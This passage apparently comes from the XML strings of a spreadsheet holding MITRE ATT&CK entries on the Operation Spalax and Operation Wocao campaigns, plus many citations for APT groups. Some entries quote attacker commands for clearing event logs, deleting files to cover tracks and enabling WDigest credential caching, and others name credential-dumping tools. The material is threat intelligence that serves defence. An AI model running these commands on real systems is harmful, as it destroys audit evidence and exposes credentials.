    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used dynamic DNS services, including Duck DNS and DNS Exit, as part of their C2 infrastructure.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors relied on a victim to open a PDF document and click on an embedded malicious link to download malware.(Citation: ESET Operation Spalax Jan 2021) </t>
  </si>
  <si>
    <t>During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors relied on a victim to click on a malicious link distributed via phishing emails.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors obtained malware, including [Remcos](https://attack.mitre.org/software/S0332), [njRAT](https://attack.mitre.org/software/S0385), and AsyncRAT.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used XOR-encrypted payloads.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used `rundll32.exe` to execute malicious installers.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used a variety of packers, including CyaX, to obfuscate malicious executables.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors sent phishing emails that included a PDF document that in some cases led to the download and execution of malware.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors sent phishing emails to victims that contained a malicious link.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used packers that read pixel data from images contained in PE files' resource sections and build the next layer of execution from the data.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors obtained packers such as CyaX.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors staged malware and malicious files in legitimate hosting services such as OneDrive or MediaFire.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used droppers that would run anti-analysis checks before executing malware on a compromised host.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used OneDrive and MediaFire to host payloads.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors archived collected files with WinRAR, prior to exfiltration.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors' proxy implementation "Agent" upgraded the socket in use to a TLS socket.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used a script to collect information about the infected system.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors deleted all Windows system and security event logs using `/Q /c wevtutil cl system` and `/Q /c wevtutil cl security`.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors collected clipboard data in plaintext.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [Mimikatz](https://attack.mitre.org/software/S0002)'s DCSync to dump credentials from the memory of the targeted system.(Citation: FoxIT Wocao December 2019) </t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors encrypted IP addresses used for "Agent" proxy hops with RC4.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors exfiltrated files and directories of interest from the targeted system.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used PowerShell to add and delete rules in the Windows firewall.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the `net` command to retrieve information about domain accounts.(Citation: FoxIT Wocao December 2019) </t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used domain credentials, including domain admin, for lateral movement and privilege escalation.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>For [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors registered email accounts to use during the campaign.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the XServer backdoor to exfiltrate data.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors gained initial access by exploiting vulnerabilities in JBoss webservers.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used stolen credentials to connect to the victim's network via VPN.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors consistently removed traces of their activity by first overwriting a file using `/c cd /d c:\windows\temp\ &amp; copy \\&lt;IP ADDRESS&gt;\c$\windows\system32\devmgr.dll \\&lt;IP ADDRESS&gt;\c$\windows\temp\LMAKSW.ps1 /y` and then deleting the overwritten file using `/c cd /d c:\windows\temp\ &amp; del \\&lt;IP ADDRESS&gt;\c$\windows\temp\LMAKSW.ps1`.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors gathered a recursive directory listing to find files and directories of interest.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors targeted people based on their organizational roles and privileges.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors edited variable names within the [Impacket](https://attack.mitre.org/software/S0357) suite to avoid automated detection.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors downloaded additional files to the infected system.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors proxied traffic through multiple infected systems.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used a Visual Basic script that checked for internet connectivity.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [PowerSploit](https://attack.mitre.org/software/S0194)'s `Invoke-Kerberoast` module to request encrypted service tickets and bruteforce the passwords of Windows service accounts offline.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors obtained the password for the victim's password manager via a custom keylogger.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used ProcDump to dump credentials from memory.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used SMB to copy files to and from target systems.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used local account credentials found during the intrusion for lateral movement and privilege escalation.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors staged archived files in a temporary directory prior to exfiltration.(Citation: FoxIT Wocao December 2019) </t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the command `net localgroup administrators` to list all administrators part of a local group.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors developed their own custom webshells to upload to compromised servers.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors renamed some tools and executables to appear as legitimate programs.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors enabled Wdigest by changing the `HKLM\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\WDigest` registry value from 0 (disabled) to 1 (enabled).(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used a custom collection method to intercept two-factor authentication soft tokens.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors executed commands through the installed web shell via [Tor](https://attack.mitre.org/software/S0183) exit nodes.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the `CreateProcessA` and `ShellExecute` API functions to launch commands after being injected into a selected process.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors scanned for open ports and used nbtscan to find NETBIOS nameservers.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors discovered network disks mounted to the system using [netstat](https://attack.mitre.org/software/S0104).(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used a custom protocol for command and control.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors used uncommon high ports for its backdoor C2, including ports 25667 and 470000.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors executed PowerShell commands which were encoded or compressed using Base64, zlib, and XOR.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors accessed and collected credentials from password managers.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors discovered removable disks attached to a system.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used PowerShell on compromised systems.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [Mimikatz](https://attack.mitre.org/software/S0002) to dump certificates and private keys from the Windows certificate store.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors used `tasklist` to collect a list of running processes on an infected system.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors injected code into a selected process, which in turn launches a command as a child process of the original.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used a custom proxy tool called "Agent" which has support for multiple hops.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors' backdoors were written in Python and compiled with py2exe.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors executed `/c cd /d c:\windows\temp\ &amp; reg query HKEY_CURRENT_USER\Software\&lt;username&gt;\PuTTY\Sessions\` to detect recent PuTTY sessions, likely to further lateral movement.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used `nbtscan` and `ping` to discover remote systems, as well as `dsquery subnet` on a domain controller to retrieve all subnets in the Active Directory.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [Impacket](https://attack.mitre.org/software/S0357)'s smbexec.py as well as accessing the C$ and IPC$ shares to move laterally.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used scheduled tasks to execute malicious PowerShell code on remote systems.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used scripts to detect security software.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>For [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors purchased servers with Bitcoin to use during the operation.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors created services on remote systems for execution purposes.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors collected a list of installed software on the infected system.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors discovered the local disks attached to the system and their hardware information including manufacturer and model, as well as the OS versions of systems connected to a targeted network.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors discovered the local network configuration with `ipconfig`.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors collected a list of open connections on the infected system using `netstat` and checks whether it has an internet connection.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors enumerated sessions and users on a remote host, and identified privileged users logged into a targeted system.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the `tasklist` command to search for one of its backdoors.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the `time` command to retrieve the current time of a compromised system.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>For [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors obtained a variety of open source tools, including JexBoss, KeeThief, and [BloodHound](https://attack.mitre.org/software/S0521).(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used valid VPN credentials to gain initial access.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used VBScript to conduct reconnaissance on targeted systems.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors’ XServer tool communicated using HTTP and HTTPS.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used their own web shells, as well as those previously placed on target systems by other threat actors, for reconnaissance and lateral movement.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors spawned a new `cmd.exe` process to execute commands.(Citation: FoxIT Wocao December 2019) </t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors has used WMI to execute commands.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>(Citation: Mandiant APT1 Appendix)(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>(Citation: Moran 2013)(Citation: Moran 2014)</t>
  </si>
  <si>
    <t>(Citation: Moran 2014)</t>
  </si>
  <si>
    <t>(Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>(Citation: RSA2017 Detect and Respond Adair)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>(Citation: Dell Lateral Movement)</t>
  </si>
  <si>
    <t>(Citation: Dell Lateral Movement)(Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Sofacy)(Citation: Securelist Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28)(Citation: Kaspersky Sofacy)(Citation: Securelist Sofacy Feb 2018)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>(Citation: Sofacy DealersChoice)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>(Citation: ESET Sednit Part 3)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>(Citation: Überwachung APT28 Forfiles June 2015)</t>
  </si>
  <si>
    <t>(Citation: Fysbis Palo Alto Analysis)</t>
  </si>
  <si>
    <t>(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28 January 2017)(Citation: Kaspersky Sofacy)(Citation: Securelist Sofacy Feb 2018)(Citation: US District Court Indictment GRU Oct 2018)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Sofacy 06-2018)</t>
  </si>
  <si>
    <t>(Citation: XAgentOSX 2017)(Citation: Sofacy Komplex Trojan)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t xml:space="preserve">(Citation: FireEye APT28 Hospitality Aug 2017)(Citation: US District Court Indictment GRU Oct 2018) </t>
  </si>
  <si>
    <t>(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>(Citation: Überwachung APT28 Forfiles June 2015)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>(Citation: XAgentOSX 2017)(Citation: Symantec APT28 Oct 2018)(Citation: US District Court Indictment GRU Oct 2018)</t>
  </si>
  <si>
    <t>(Citation: ESET Sednit Part 3)(Citation: Symantec APT28 Oct 2018)(Citation: US District Court Indictment GRU Oct 2018)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: CrowdStrike StellarParticle January 2022)(Citation: ESET T3 Threat Report 2021)</t>
  </si>
  <si>
    <t>(Citation: ESET T3 Threat Report 2021)</t>
  </si>
  <si>
    <t>(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT29 Nov 2018)(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: SentinelOne NobleBaron June 2021)(Citation: ESET T3 Threat Report 2021)(Citation: Secureworks IRON RITUAL Profile)(Citation: Secureworks IRON RITUAL USAID Phish May 2021)</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes)(Citation: Secureworks IRON HEMLOCK Profile)</t>
  </si>
  <si>
    <t>(Citation: ESET Dukes October 2019)(Citation: Secureworks IRON HEMLOCK Profile)</t>
  </si>
  <si>
    <t>(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>(Citation: MSTIC NOBELIUM Mar 2021)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: Secureworks IRON RITUAL Profile)</t>
  </si>
  <si>
    <t>(Citation: MSTIC NOBELIUM Mar 2021)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: Secureworks IRON RITUAL Profile)</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes)(Citation: Microsoft 365 Defender Solorigate)(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: Secureworks IRON HEMLOCK Profile)</t>
  </si>
  <si>
    <t>(Citation: SentinelOne NobleBaron June 2021)</t>
  </si>
  <si>
    <t>(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>(Citation: Symantec RAINDROP January 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: Secureworks IRON RITUAL Profile)</t>
  </si>
  <si>
    <t>(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Secureworks IRON RITUAL Profile)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Secureworks IRON HEMLOCK Profile)</t>
  </si>
  <si>
    <t>(Citation: NCSC APT29 July 2020)(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: Secureworks IRON RITUAL Profile)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)</t>
  </si>
  <si>
    <t>(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)</t>
  </si>
  <si>
    <t>(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>(Citation: FireEye Clandestine Fox Part 2)</t>
  </si>
  <si>
    <t>(Citation: FireEye Clandestine Wolf)</t>
  </si>
  <si>
    <t>(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: Volexity Ocean Lotus November 2020)(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT32 May 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro MacOS April 2018)(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT33 Guardrail)(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT33 Sept 2017)(Citation: FireEye APT33 Webinar Sept 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT33 Webinar Sept 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT33 Guardrail)(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT33 Sept 2017)(Citation: FireEye APT33 Webinar Sept 2017)(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT37 Feb 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>(Citation: Talos Group123)(Citation: Securelist ScarCruft May 2019)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>(Citation: ESET Lazarus KillDisk April 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: Dark Reading APT39 JAN 2019)(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>(Citation: Symantec Chafer Dec 2015)(Citation: Securelist Remexi Jan 2019)(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT39 Jan 2019)(Citation: Dark Reading APT39 JAN 2019)</t>
  </si>
  <si>
    <t>(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT41 March 2020)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>(Citation: FireEye MESSAGETAP October 2019)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT41 Aug 2019)(Citation: Recorded Future RedEcho Feb 2021)</t>
  </si>
  <si>
    <t>(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>(Citation: Check Point Rocket Kitten)</t>
  </si>
  <si>
    <t>(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)</t>
  </si>
  <si>
    <t>(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
